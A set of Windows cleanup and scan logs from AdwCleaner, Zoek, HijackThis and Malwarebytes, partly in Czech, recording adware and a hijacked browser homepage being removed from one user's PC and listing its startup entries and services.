[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Smazáno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Smazáno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
Zoek.exe v5.0.0.1 Updated 27-09-2015
Tool run by Nekut on 15.03.2017 at 21:00:29,42.
Microsoft Windows 10 Home 10.0.14393 x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\Nekut\Downloads\zoek.exe [Scan all users] [Script inserted]
==== System Restore Info ======================
15.03.2017 21:01:08 Zoek.exe System Restore Point Created Successfully.
==== Reset Hosts File ======================
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
==== Empty Folders Check ======================
C:\PROGRA~2\EaseUS deleted successfully
C:\PROGRA~2\GMT-MAX.ORG deleted successfully
C:\PROGRA~2\Paradox Interactive deleted successfully
C:\PROGRA~3\Comms deleted successfully
C:\PROGRA~3\iolo deleted successfully
C:\PROGRA~3\ProcessLasso deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\Users\Nekut\AppData\Local\Opera Software deleted successfully
C:\Users\Nekut\AppData\Local\Skype deleted successfully
C:\Users\Nekut\AppData\Local\Unity deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\CrashDumps deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Maps deleted successfully
==== Deleting CLSID Registry Keys ======================
==== Deleting CLSID Registry Values ======================
==== Deleting Services ======================
==== Deleting Files \ Folders ======================
C:\PROGRA~2\EaseUS not found
C:\PROGRA~2\GMT-MAX.ORG not found
C:\PROGRA~2\Paradox Interactive not found
C:\Users\Nekut\.android deleted
C:\ArchiCAD.exe deleted
C:\PROGRA~3\Package Cache deleted
C:\Users\Nekut\AppData\LocalLow\Unity deleted
C:\windows\SysNative\GroupPolicy\Machine deleted
C:\windows\SysNative\GroupPolicy\User deleted
"C:\WINDOWS\Installer\6e9261ef.msi" deleted
"C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4" deleted
"C:\Users\Nekut\AppData\Roaming\wHAbZSf" deleted
"C:\Users\Nekut\AppData\Roaming\{CEBA18AE-2A9A-6320-414B-A6E90A6F3D65}" deleted
"C:\ProgramData\0UCpIPGzc" deleted
"C:\ProgramData\2E0iHajzc" deleted
"C:\ProgramData\2STjR2fzc" deleted
"C:\ProgramData\2T8PQ0ozc" deleted
"C:\ProgramData\4cVy5Elzc" deleted
"C:\ProgramData\5mgFUcozc" deleted
"C:\ProgramData\5xH9QPIzc" deleted
"C:\ProgramData\627brqPzc" deleted
"C:\ProgramData\79J6QIPzc" deleted
"C:\ProgramData\89SWimOzc" deleted
"C:\ProgramData\aHOqXrNzc" deleted
"C:\ProgramData\ay7uDJtzc" deleted
"C:\ProgramData\bGrpTDUzc" deleted
"C:\ProgramData\BNV2z0kzc" deleted
"C:\ProgramData\brg5p4Kzc" deleted
"C:\ProgramData\by6ux00zc" deleted
"C:\ProgramData\c2WWvVnzc" deleted
"C:\ProgramData\DEBcGyrzc" deleted
"C:\ProgramData\dfIskAtzc" deleted
"C:\ProgramData\dxp37PAzc" deleted
"C:\ProgramData\e6nqO2Xzc" deleted
"C:\ProgramData\EL5rXkNzc" deleted
"C:\ProgramData\eUWHveYzc" deleted
"C:\ProgramData\Fo7vCrzzc" deleted
"C:\ProgramData\FOpfAaDzc" deleted
"C:\ProgramData\g3kq0iAzc" deleted
"C:\ProgramData\GcJ781Lzc" deleted
"C:\ProgramData\GXprCWDzc" deleted
"C:\ProgramData\H0LHhnqzc" deleted
"C:\ProgramData\hbUnwJ8zc" deleted
"C:\ProgramData\hdQdWG6zc" deleted
"C:\ProgramData\HKQht5Gzc" deleted
"C:\ProgramData\HXsvdVdzc" deleted
"C:\ProgramData\i5KKrX3zc" deleted
"C:\ProgramData\ID9HJwOzc" deleted
"C:\ProgramData\Iz4RsEczc" deleted
"C:\ProgramData\J2Y2qWczc" deleted
"C:\ProgramData\jS1ABWfzc" deleted
"C:\ProgramData\JZ8ytIqzc" deleted
"C:\ProgramData\kfS9cb0zc" deleted
"C:\ProgramData\KnVFGZjzc" deleted
"C:\ProgramData\LJCSts9zc" deleted
"C:\ProgramData\lnugmidzc" deleted
"C:\ProgramData\LTTp9sKzc" deleted
"C:\ProgramData\M6Kutuvzc" deleted
"C:\ProgramData\mBrJGWEzc" deleted
"C:\ProgramData\MdG2AtYzc" deleted
"C:\ProgramData\msfj2oozc" deleted
"C:\ProgramData\mTsKISEzc" deleted
"C:\ProgramData\N0est6Pzc" deleted
"C:\ProgramData\oonEb2Rzc" deleted
"C:\ProgramData\oq0nGfrzc" deleted
"C:\ProgramData\phsAUjwzc" deleted
"C:\ProgramData\pPzuMXRzc" deleted
"C:\ProgramData\PyeoHhtzc" deleted
"C:\ProgramData\RNvU5Cxzc" deleted
"C:\ProgramData\S6IaBoxzc" deleted
"C:\ProgramData\SeUwCOBzc" deleted
"C:\ProgramData\SLLCTC9zc" deleted
"C:\ProgramData\SPYk5ixzc" deleted
"C:\ProgramData\T3JTkRXzc" deleted
"C:\ProgramData\tIUeuvQzc" deleted
"C:\ProgramData\u4sgF2Uzc" deleted
"C:\ProgramData\U7NxdGqzc" deleted
"C:\ProgramData\Uek61kyzc" deleted
"C:\ProgramData\uFT7fi2zc" deleted
"C:\ProgramData\VPKLV6Hzc" deleted
"C:\ProgramData\wAuHjQozc" deleted
"C:\ProgramData\WMeI7DBzc" deleted
"C:\ProgramData\WnwrhQJzc" deleted
"C:\ProgramData\wpjUWBwzc" deleted
"C:\ProgramData\X3VjBkOzc" deleted
"C:\ProgramData\XVtxTxfzc" deleted
"C:\ProgramData\zDTV0xdzc" deleted
"C:\ProgramData\Zq5fWtTzc" deleted
"C:\ProgramData\ZVBDYntzc" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.key" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.pub" deleted
"C:\Users\Nekut\AppData\Roaming\iolo" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle" deleted
==== Chromium Look ======================
Google Chrome Version: 46.0.2490.86
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
efaidnbmnnnibpcajpcglclefindmkaj - No path found[]
lifbcibllhkdhoafpjfnlhfpfgnpldfl - No path found[]
internetquickaccess - Nekut\AppData\Local\Chromium\User Data\Default\Extensions\ddlhogjgfofpgmkognopimmilcldcepb
Chrome Media Router - Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
==== Chromium Fix ======================
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage-journal deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage-journal deleted successfully
==== Set IE to Default ======================
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="yes"
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157"
"Use Search Asst"="no"
==== All HKCU SearchScopes ======================
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"
==== Reset Google Chrome ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal was reset successfully
==== Deleting Registry Keys ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{28B89EEF-0004-0000-5102-CF3F3A09B77D} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
==== Empty IE Cache ======================
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
==== Empty FireFox Cache ======================
No FireFox Profiles found
==== Empty Chrome Cache ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Cache emptied successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
==== Empty All Flash Cache ======================
No Flash Cache Found
==== Empty All Java Cache ======================
No Java Cache Found
==== C:\zoek_backup content ======================
C:\zoek_backup (files=164 folders=60 1447156033 bytes)
==== Empty Temp Folders ======================
C:\WINDOWS\Temp will be emptied at reboot
==== After Reboot ======================
==== Empty Temp Folders ======================
C:\WINDOWS\Temp successfully emptied
C:\Users\Nekut\AppData\Local\Temp successfully emptied
==== Empty Recycle Bin ======================
C:\$RECYCLE.BIN successfully emptied
==== EOF on 15.03.2017 at 21:18:40,78 ======================
Scan saved at 21:21:58, on 15.03.2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0953)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Nekut\Downloads\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Autodesk Desktop App] "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
O4 - HKLM\..\Run: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
O4 - HKLM\..\Run: [4StoryPrePatch] C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
O4 - HKLM\..\Run: [GameforgeLive] "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools Lite Automount] "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
O4 - HKCU\..\Run: [BitTorrent] "C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: O&O Defrag Tray.lnk = ?
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted IP range: http://192.168.10.1
O15 - ESC Trusted IP range: http://192.168.10.1
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Autodesk Desktop App Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: Disc Soft Lite Bus Service - Disc Soft Ltd - C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Security Assist Helper (isaHelperSvc) - Unknown owner - C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - Unknown owner - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe (file missing)
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: O&O Defrag (OODefragAgent) - O&O Software GmbH - C:\Program Files\OO Software\Defrag\oodag.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Unknown owner - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: Spybot-S&D 2 Security Center Service (SDWSCService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 11925 bytes
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:23
Logovací soubor: mwanm.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1510
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433429
Uplynulý čas: 10 min, 35 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 9
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\EXTENSIONS\fnhfdmnphmbbjbgppnpcddkefmeokfho, Žádná uživatelská akce, [3239], [360481],1.0.1510
Soubor: 30
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.eot, Žádná uživatelská akce, [3239], [360481],1.0.1510
